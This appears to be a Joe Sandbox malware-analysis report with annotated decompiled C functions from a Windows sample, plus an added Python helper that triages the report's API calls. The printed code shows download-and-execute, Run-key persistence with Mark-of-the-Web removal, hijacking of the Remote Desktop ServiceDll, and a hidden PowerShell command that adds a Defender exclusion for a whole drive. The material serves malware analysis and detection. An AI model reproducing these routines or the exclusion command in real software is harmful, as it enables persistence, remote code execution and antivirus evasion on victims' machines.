                                      0x0043f1be
                                      0x0043f1c8
                                      0x0043f1ca
                                      0x0043f1da
                                      0x0043f1da
                                      0x0043f1e2
                                      0x0043f257
                                      0x0043f25d
                                      0x0043f273
                                      0x0043f27b
                                      0x0043f283
                                      0x0043f28e
                                      0x0043f28f
                                      0x0043f1e4
                                      0x0043f1e7
                                      0x0043f1f0
                                      0x0043f1f0
                                      0x0043f20c
                                      0x0043f219
                                      0x0043f234
                                      0x0043f23e
                                      0x0043f246
                                      0x0043f24b
                                      0x0043f24d
                                      0x0043f252
                                      0x00000000
                                      0x0043f252
                                      0x0043f24d
                                      0x0043f20c
                                      0x0043f1e2
                                      0x0043f16e
                                      0x0043f10a
                                      0x0043f297
                                      0x0043f29f
                                      0x0043f2aa

                                      APIs
                                        • Part of subcall function 0043D425: GetModuleFileNameW.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,0043F41F,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 0043D444
                                        • Part of subcall function 0043EF0C: RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000001,00000001,00000000,?,00000000,?,?,?,0043F0F4,?,?), ref: 0043EF2C
                                        • Part of subcall function 0043EF4C: RegCloseKey.ADVAPI32(?,?,0043F043,?,0043F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0043EF56
                                      • DeleteFileW.KERNEL32(?,00000000,:Zone.Identifier,?,?,?,?,?,?,?,00000000,?,?,00441336,?,?), ref: 0043F283
                                        • Part of subcall function 0043D75B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0043D78C
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                        • Part of subcall function 0043D70F: SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 0043D715
                                        • Part of subcall function 0043345A: lstrcpyW.KERNEL32(00000000,?), ref: 00433484
                                        • Part of subcall function 00433162: lstrcatW.KERNEL32(00000000,?), ref: 00433192
                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 0043F166
                                        • Part of subcall function 0043EFFE: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,0043F392,80000001,?), ref: 0043F032
                                        • Part of subcall function 0043EFFE: RegOpenKeyExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,0043F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0043F04D
                                        • Part of subcall function 0043EFCB: RegSetValueExW.ADVAPI32(?,?,00000000,?,?,?,?,?,0043F239,?,00000000,?,00000001,?,?,?), ref: 0043EFEA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile$lstrcpy$CloseCopyDeleteDirectoryFolderFreeModuleNameOpenPathSpecialValueVirtuallstrcat
                                      • String ID: :Zone.Identifier
                                      • API String ID: 1638721540-2436405130
                                      • Opcode ID: ed439c0078f00de07f50c5a97037ee7da8962be81f506b31e4766473c0cb99c8
                                      • Instruction ID: 599f7f9652993f71943331d0b67b950569ec96e55e1c31ea43fa73c57f849d74
                                      • Opcode Fuzzy Hash: ed439c0078f00de07f50c5a97037ee7da8962be81f506b31e4766473c0cb99c8
                                      • Instruction Fuzzy Hash: A9516271600509BBDB09FF62DC92CEEB329BF58308F00512FB50656591EF78AE45CB98
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      APIs
                                      • SetEvent.KERNEL32(?,?,?,?,?), ref: 00441810
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Event
                                      • String ID: (mD$DmD
                                      • API String ID: 4201588131-2164705182
                                      • Opcode ID: b307d4fc2d7443e5bac13065cb265edf9e1eea5a0ad9793b99c921fb8fcf7eb7
                                      • Instruction ID: f0ec14366b69098a8883969d287e300d6991a3defd019712509bf2f95409154b
                                      • Opcode Fuzzy Hash: b307d4fc2d7443e5bac13065cb265edf9e1eea5a0ad9793b99c921fb8fcf7eb7
                                      • Instruction Fuzzy Hash: 10519379A00106DBEB14EF14D98486A7BB6F786305B22852BD85293734CB79EDC0CB5E
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 92%
                                      			E00432675(void* __ecx, void* __eflags, signed int _a4) {
                                      				// Analyst annotation (comments added; statements are the sandbox's decompilation as-is):
                                      				// download-and-execute. _a4 carries the URL; the file is written below CSIDL_APPDATA (0x1a)
                                      				// under a generated name with the URL's extension and then opened via ShellExecuteW.
                                      				short* _v12;
                                      				void* _v16;
                                      				char _v20;
                                      				void* _t26;
                                      				void* _t36;
                                      				void* _t38;
                                      				void* _t42;
                                      				void* _t58;
                                      				void* _t59;
                                      
                                      				_t66 = __eflags;
                                      				_t42 = __ecx;
                                      				_t58 = 0x1a;
                                      				E0043D75B( &_v12, _t58, __eflags);                  // SHGetSpecialFolderPathW(CSIDL_APPDATA): _v12 = %APPDATA%
                                      				_t59 = 0xa;
                                      				_t26 = E004332D4( &_v16, _t59, __eflags);           // helper that produces the file-name stem (not resolved in this listing)
                                      				E00433162(E00433297( &_v12, _t59, _t66, "\\"), _t66, _t26);   // lstrcatW: %APPDATA%\<stem>
                                      				E00435A2D(_v16);
                                      				_t61 = _a4 + 4;
                                      				E0043345A( &_v16, _a4 + 4);                         // lstrcpyW: URL string from _a4 + 4
                                      				E00433162( &_v12, _t66, E0043334A( &_v16,  &_a4));  // PathFindExtensionW: append the URL's extension to the path
                                      				E00435A2D(_a4);
                                      				_a4 = _a4 & 0x00000000;
                                      				E00435A2D(_v16);
                                      				_t36 = E0043345A( &_a4, _t61);
                                      				__imp__URLDownloadToFileW(0, _a4, _v12, 0, 0);      // fetch URL (_a4) into the built path (_v12)
                                      				E00435A2D(_a4);
                                      				if(_t36 == 0) {                                     // decompiler ties the test to E0043345A; URLDownloadToFileW returns S_OK (0) on success
                                      					_t38 = ShellExecuteW(0, L"open", _v12, 0, 0, 5);   // run the downloaded file; nShowCmd 5 = SW_SHOW
                                      					_v16 = 2;                                        // status 2: execution failed
                                      					__eflags = _t38 - 0x20;
                                      					if(_t38 > 0x20) {                                // ShellExecuteW reports success with a value greater than 32
                                      						_v16 = 0;                                    // status 0: downloaded and started
                                      					}
                                      				} else {
                                      					_v16 = 1;                                        // status 1: download failed
                                      				}
                                      				_v20 = 0x442784;
                                      				E00434B53(_t42,  &_v20);                            // pass the status record to the caller's object
                                      				return E00435A2D(_v12);
                                      			}

                                      0x00432675
                                      0x0043267e
                                      0x00432685
                                      0x00432686
                                      0x0043268d
                                      0x00432691
                                      0x004326a8
                                      0x004326b0
                                      0x004326bb
                                      0x004326bf
                                      0x004326d4
                                      0x004326dc
                                      0x004326e4
                                      0x004326e8
                                      0x004326f4
                                      0x00432702
                                      0x0043270d
                                      0x00432714
                                      0x0043272c
                                      0x00432732
                                      0x00432739
                                      0x0043273c
                                      0x0043273e
                                      0x0043273e
                                      0x00432716
                                      0x00432716
                                      0x00432716
                                      0x00432744
                                      0x0043274e
                                      0x0043275f

                                      APIs
                                        • Part of subcall function 0043D75B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0043D78C
                                        • Part of subcall function 00433162: lstrcatW.KERNEL32(00000000,?), ref: 00433192
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                        • Part of subcall function 0043345A: lstrcpyW.KERNEL32(00000000,?), ref: 00433484
                                        • Part of subcall function 0043334A: PathFindExtensionW.SHLWAPI(?), ref: 00433354
                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00432702
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 0043272C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Path$DownloadExecuteExtensionFileFindFolderFreeShellSpecialVirtuallstrcatlstrcpy
                                      • String ID: open
                                      • API String ID: 4166385161-2758837156
                                      • Opcode ID: 21d573ecc31148a964c2e78ab16f5c63ee3fce036b1afa9a834bb85b29c4ebfc
                                      • Instruction ID: 1d7a141d5aed499853fa49e7ed9c6239a4e90f113e5ff73ee0ee056807b2069e
                                      • Opcode Fuzzy Hash: 21d573ecc31148a964c2e78ab16f5c63ee3fce036b1afa9a834bb85b29c4ebfc
                                      • Instruction Fuzzy Hash: CF21D335E00208BBCB04BFA2DC86EEEBB34AF88708F10505EF81667191DB785A45CB58
                                      Uniqueness

                                      Uniqueness Score: 37.75%
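Added example, not part of the Joe Sandbox report and not code from the analysed sample: a small Python triage helper that parses the bullet lines of the "APIs" lists shown above for E0043F0C8 and E00432675, decodes the registry hive and samDesired constants this sample passes to the registry APIs (0x80000001, 0xF003F, 0x20006, 0x20119), and tags the behaviours visible in those two functions (self-copy, Run-key persistence, Zone.Identifier removal, download-and-execute). The two sample inputs are constructed from bullets copied off this page; the rule names and the tag logic are this example's own choices, not Joe Sandbox signatures.

```python
import re

# One bullet of a Joe Sandbox "APIs" list, e.g.
#   • CopyFileW.KERNEL32(?,?,00000000), ref: 0043F166
#   • Part of subcall function 0043D425: GetModuleFileNameW.KERNEL32(...), ref: 0043D444
#   • _free.LIBCMT ref: 00CC59D4                 (no argument list)
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)

# Windows SDK registry constants.
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
COMPOSITE_RIGHTS = [(0xF003F, "KEY_ALL_ACCESS"), (0x20019, "KEY_READ"), (0x20006, "KEY_WRITE")]
SINGLE_RIGHTS = [(0x1, "KEY_QUERY_VALUE"), (0x2, "KEY_SET_VALUE"), (0x4, "KEY_CREATE_SUB_KEY"),
                 (0x8, "KEY_ENUMERATE_SUB_KEYS"), (0x10, "KEY_NOTIFY"), (0x20, "KEY_CREATE_LINK"),
                 (0x100, "KEY_WOW64_64KEY"), (0x200, "KEY_WOW64_32KEY"), (0x10000, "DELETE"),
                 (0x20000, "READ_CONTROL"), (0x40000, "WRITE_DAC"), (0x80000, "WRITE_OWNER")]


def decode_key_access(mask):
    """Render a samDesired mask by name, e.g. 0x20119 -> 'KEY_READ|KEY_WOW64_64KEY'."""
    names = []
    for bits, name in COMPOSITE_RIGHTS:        # widest composite first, use at most one
        if mask & bits == bits:
            names.append(name)
            mask &= ~bits
            break
    for bit, name in SINGLE_RIGHTS:
        if mask & bit:
            names.append(name)
            mask &= ~bit
    if mask:
        names.append(hex(mask))                # bits this table does not know
    return "|".join(names) or "0"


def as_int(arg):
    """Joe Sandbox prints numeric arguments as 8 hex digits; '?' means not recorded."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def parse_api_lines(text):
    """One dict per API bullet; other lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        calls.append({"api": m.group("api"), "module": m.group("module"),
                      "args": [a.strip() for a in raw.split(",")] if raw is not None else [],
                      "ref": m.group("ref"), "via": m.group("sub")})
    return calls


def describe_registry_call(call):
    """(hive, access) for RegOpenKeyExW / RegCreateKeyExW, None for other APIs."""
    if call["api"] not in ("RegOpenKeyExW", "RegCreateKeyExW"):
        return None
    args = call["args"]
    hive = HIVES.get(as_int(args[0]), args[0]) if args else "?"
    idx = 3 if call["api"] == "RegOpenKeyExW" else 5   # position of samDesired in each prototype
    sam = as_int(args[idx]) if len(args) > idx else None
    return hive, (decode_key_access(sam) if sam is not None else "?")


def classify(calls):
    """Behaviour tags (names chosen for this example) derived from the API set and arguments."""
    apis = {c["api"] for c in calls}
    all_args = [a for c in calls for a in c["args"]]
    tags = []
    if {"GetModuleFileNameW", "CopyFileW"} <= apis:
        tags.append("self_copy")                       # copies its own image elsewhere
    if any("CurrentVersion\\Run" in a for a in all_args) and apis & {"RegCreateKeyExW", "RegOpenKeyExW", "RegSetValueExW"}:
        tags.append("run_key_persistence")
    if any(c["api"] == "DeleteFileW" and ":Zone.Identifier" in c["args"] for c in calls):
        tags.append("motw_removal")                    # deletes the Mark-of-the-Web ADS
    if {"URLDownloadToFileW", "ShellExecuteW"} <= apis:
        tags.append("download_execute")
    return tags


def triage(report_text):
    calls = parse_api_lines(report_text)
    regs = [d for d in (describe_registry_call(c) for c in calls) if d]
    return {"calls": len(calls), "tags": classify(calls), "registry": regs}


# Constructed input: bullets copied from the APIs lists of E0043F0C8 and E00432675 on this page.
SAMPLE_E0043F0C8 = r"""
  • Part of subcall function 0043D425: GetModuleFileNameW.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,0043F41F,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 0043D444
  • Part of subcall function 0043EF0C: RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000001,00000001,00000000,?,00000000,?,?,?,0043F0F4,?,?), ref: 0043EF2C
• DeleteFileW.KERNEL32(?,00000000,:Zone.Identifier,?,?,?,?,?,?,?,00000000,?,?,00441336,?,?), ref: 0043F283
• CopyFileW.KERNEL32(?,?,00000000), ref: 0043F166
  • Part of subcall function 0043EFFE: RegOpenKeyExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,0043F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0043F04D
  • Part of subcall function 0043EFCB: RegSetValueExW.ADVAPI32(?,?,00000000,?,?,?,?,?,0043F239,?,00000000,?,00000001,?,?,?), ref: 0043EFEA
"""
SAMPLE_E00432675 = r"""
  • Part of subcall function 0043D75B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0043D78C
• URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00432702
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 0043272C
"""

if __name__ == "__main__":
    for name, text in (("E0043F0C8", SAMPLE_E0043F0C8), ("E00432675", SAMPLE_E00432675)):
        print(name, triage(text))
```

The parser keeps the "Part of subcall function" address in `via`, so a tag raised only through a subcall (as the GetModuleFileNameW and RegCreateKeyExW bullets above are) can still be traced back to the helper that made the call. Arguments printed as `?` were not recorded by the sandbox, which is why the RegOpenKeyExW entry in the first sample decodes to unknown hive and access rather than to a guessed value.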

                                      C-Code - Quality: 100%
                                      			E0043C1A0(void* __edx) {
                                      				// Analyst annotation (comments added; statements are the sandbox's decompilation as-is):
                                      				// reads the ServiceDll of the Terminal Services (RDP) service from HKLM and checks it
                                      				// against a string constant at 0x447d0c; the comparison result is the return value.
                                      				void* _v8;
                                      				void* _v12;
                                      				short* _v16;
                                      				int _v20;
                                      				char _v24;
                                      				void* _t28;
                                      				void* _t46;
                                      				int _t48;
                                      
                                      				_t46 = __edx;
                                      				_v8 = 0;
                                      				E00433412( &_v16, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
                                      				_v24 = 0;
                                      				_v20 = 0;
                                      				if(RegOpenKeyExW(0x80000002, _v16, 0, 0x20119,  &_v8) != 0) {   // HKEY_LOCAL_MACHINE; 0x20119 = KEY_READ | KEY_WOW64_64KEY (64-bit view on WOW64)
                                      					L3:
                                      					_t48 = 0;                                                    // key missing or not readable: report 0
                                      				} else {
                                      					_t28 = E0043EF61( &_v8, _t46, E00433412( &_v12, L"ServiceDll"),  &_v24);   // read the ServiceDll value into _v24
                                      					E00435A2D(_v12);
                                      					if(_t28 != 0) {
                                      						_t48 = E00433075(E00432D08( &_v24, __eflags,  &_v12), 0x447d0c);   // likely a string comparison against the constant at 0x447d0c (not resolved in this listing)
                                      						E00435A2D(_v12);
                                      						_v12 = 0;
                                      					} else {
                                      						E0043EF4C( &_v8);                                        // RegCloseKey
                                      						goto L3;
                                      					}
                                      				}
                                      				E00432E66( &_v24);
                                      				E00435A2D(_v16);
                                      				E0043EF4C( &_v8);                                            // RegCloseKey
                                      				return _t48;
                                      			}
                                      Line addresses: 0x0043c1a0 0x0043c1b2 0x0043c1b5 0x0043c1bd 0x0043c1ca 0x0043c1da 0x0043c20c 0x0043c20c 0x0043c1dc 0x0043c1f1 0x0043c1fb 0x0043c202 0x0043c247 0x0043c249 0x0043c24e 0x0043c204 0x0043c207 0x00000000 0x0043c207 0x0043c202 0x0043c211 0x0043c219 0x0043c221 0x0043c22b

                                      APIs
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,00447CD8,?,?,0043C6D5,?,?), ref: 0043C1D2
                                        • Part of subcall function 0043EF61: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00000000,?,?,?,?,0043F3B9,?,0000000A,80000001), ref: 0043EF84
                                        • Part of subcall function 0043EF61: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000,?,0043F3B9,?,0000000A,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0043EFA7
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                        • Part of subcall function 0043EF4C: RegCloseKey.ADVAPI32(?,?,0043F043,?,0043F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0043EF56
                                      Strings
                                      • ServiceDll, xrefs: 0043C1E0
                                      • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043C1AD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                      • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                      • API String ID: 1903904756-387424650
                                      • Opcode ID: f2b37373d0db639e808bf81f046c50cfdde575743cada564847f672103e466d2
                                      • Instruction ID: c23e37af1a3d891c559c014dd3a11411673a4150319cbeafd3fbbf665f860105
                                      • Opcode Fuzzy Hash: f2b37373d0db639e808bf81f046c50cfdde575743cada564847f672103e466d2
                                      • Instruction Fuzzy Hash: 30116371D00118BBDB14FFE2D9428EEB778AF58704F10119BA801B3191EB785F00DB94
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      C-Code - Quality: 100%
                                      			// Writes the ServiceDll value of the Remote Desktop service. svchost loads
                                      			// the DLL named there when TermService starts, so the path taken from the
                                      			// object at this+0x34 runs in the service's context on the next start.
                                      			// E0043EFCB wraps RegSetValueExW (see APIs below).
                                      			E0043BD37(void* __ecx, void* __edx) {
                                      				void* _v12;           // HKEY
                                      				void* _v16;           // value-name buffer
                                      				short* _v20;          // wide copy of the key path
                                      				int _v24;
                                      				char _v28;
                                      				char _v36;            // string built from this+0x34 (the DLL path to write)
                                      				void* _t26;
                                      				void* _t28;
                                      				void* _t43;
                                      				int _t44;             // return value: 1 on success, otherwise 0
                                      				void* _t45;
                                      
                                      				_t43 = __edx;
                                      				_t45 = __ecx;         // this pointer
                                      				_t44 = 0;
                                      				_v12 = 0;
                                      				E00433412( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
                                      				_v28 = 0;
                                      				_v24 = 0;
                                      				// 0x102 = KEY_SET_VALUE | KEY_WOW64_64KEY; writing here needs administrative rights
                                      				if(RegOpenKeyExW(0x80000002, _v20, 0, 0x102,  &_v12) == 0) {
                                      					_t26 = E0043304E(_t45 + 0x34, _t43,  &_v36);
                                      					// the trailing 2 is most plausibly the REG_EXPAND_SZ type, which is the
                                      					// type of the default %SystemRoot%\System32\termsrv.dll value
                                      					_t28 = E0043EFCB( &_v12, E00433412( &_v16, L"ServiceDll"), _t26, 2);
                                      					E00435A2D(_v16);
                                      					_v16 = 0;
                                      					E00432E66( &_v36);
                                      					E0043EF4C( &_v12);
                                      					if(_t28 != 0) {
                                      						_t44 = 1;
                                      					}
                                      				}
                                      				E00432E66( &_v28);
                                      				E00435A2D(_v20);
                                      				E0043EF4C( &_v12);
                                      				return _t44;
                                      			}
                                      Line addresses: 0x0043bd37 0x0043bd3f 0x0043bd41 0x0043bd4b 0x0043bd4e 0x0043bd56 0x0043bd63 0x0043bd73 0x0043bd7e 0x0043bd95 0x0043bd9f 0x0043bda7 0x0043bdaa 0x0043bdb2 0x0043bdb9 0x0043bdbb 0x0043bdbb 0x0043bdb9 0x0043bdbf 0x0043bdc7 0x0043bdcf 0x0043bdd9

                                      APIs
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0043BD6B
                                        • Part of subcall function 0043EFCB: RegSetValueExW.ADVAPI32(?,?,00000000,?,?,?,?,?,0043F239,?,00000000,?,00000001,?,?,?), ref: 0043EFEA
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                        • Part of subcall function 0043EF4C: RegCloseKey.ADVAPI32(?,?,0043F043,?,0043F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0043EF56
                                      Strings
                                      • ServiceDll, xrefs: 0043BD84
                                      • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043BD43
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$CloseFreeOpenValueVirtuallstrcpy
                                      • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                      • API String ID: 2854241163-387424650
                                      • Opcode ID: 48316bb73545eae32650d8d134d61b3245d498c3ec0a256d04e38f32d138778c
                                      • Instruction ID: cb5fb7306594057f90ec37a8d49f054ff846ac4948be60da11b9fe6d341589d8
                                      • Opcode Fuzzy Hash: 48316bb73545eae32650d8d134d61b3245d498c3ec0a256d04e38f32d138778c
                                      • Instruction Fuzzy Hash: 1B114F71D01118AADB14EF92CD86DEEBB78EF98704F50506EE902A2192EB785B05CA94
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      C-Code - Quality: 100%
                                      			// Builds "powershell Add-MpPreference -ExclusionPath <drive>\" from the
                                            			// first three characters of its own module path (e.g. "C:\") and runs it
                                      			// hidden: a Microsoft Defender exclusion for the whole drive. Add-MpPreference
                                      			// only succeeds from an elevated process. E004310AD allocates from the process
                                      			// heap (GetProcessHeap/HeapAlloc); E00431052, E0043102C and E004310D5 are
                                      			// used as memset, memcpy and strlen respectively.
                                      			E00440D9D(void* __ecx, void* __eflags) {
                                      				CHAR* _t21;           // command line under construction
                                      				CHAR* _t22;           // own module path
                                      
                                      				_t22 = E004310AD(0x100);
                                      				_t21 = E004310AD(0x100);
                                      				E00431052(_t22, 0, 0x100);
                                      				E00431052(_t21, 0, 0x100);
                                      				GetModuleFileNameA(0, _t22, 0x100);
                                      				E0043102C(_t21, "powershell Add-MpPreference -ExclusionPath ", E004310D5("powershell Add-MpPreference -ExclusionPath "));
                                      				_t1 =  &(_t21[0x2b]); // 0x2b = 43 = length of the prefix above
                                      				E0043102C(_t1, _t22, 3);   // append drive letter, colon and backslash
                                      				_t2 =  &(_t22[0xff]); // 0xff: last byte of the zeroed path buffer, i.e. a NUL
                                      				E0043102C(E004310D5(_t21) + _t21, _t2, 1);   // terminate the command string
                                      				return WinExec(_t21, 0);   // uCmdShow 0 = SW_HIDE
                                      			}
                                      Line addresses: 0x00440dac 0x00440db7 0x00440db9 0x00440dc2 0x00440dce 0x00440de2 0x00440de9 0x00440dee 0x00440df6 0x00440e09 0x00440e1d

                                      APIs
                                        • Part of subcall function 004310AD: GetProcessHeap.KERNEL32(00000000,00000000,0043F750,00000800,00000000,00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000), ref: 004310B3
                                        • Part of subcall function 004310AD: HeapAlloc.KERNEL32(00000000,?,00000000,?,0043F8BB,?,?,?,0043535D,?,00000000,00000000,?,?,?,00000000), ref: 004310BA
                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000100,?,?,?,?,?,?,00000000,0044131C), ref: 00440DCE
                                      • WinExec.KERNEL32(00000000,00000000), ref: 00440E14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocExecFileModuleNameProcess
                                      • String ID: powershell Add-MpPreference -ExclusionPath
                                      • API String ID: 1018710590-2194938034
                                      • Opcode ID: 61591f4922239fb1ff0582080b4f4e6afafa1469c415cd4038dbcc162a26aa5a
                                      • Instruction ID: 9362c9d4a2d22203e5655af7a500cba5875f7209c944e0269da56229bd248cb0
                                      • Opcode Fuzzy Hash: 61591f4922239fb1ff0582080b4f4e6afafa1469c415cd4038dbcc162a26aa5a
                                      • Instruction Fuzzy Hash: EEF0C8B19402407AE12433B35CCBF7B157CDF8D768F00142BF605A19D2D69C58414179
                                      Uniqueness

                                      Uniqueness Score: 37.75%
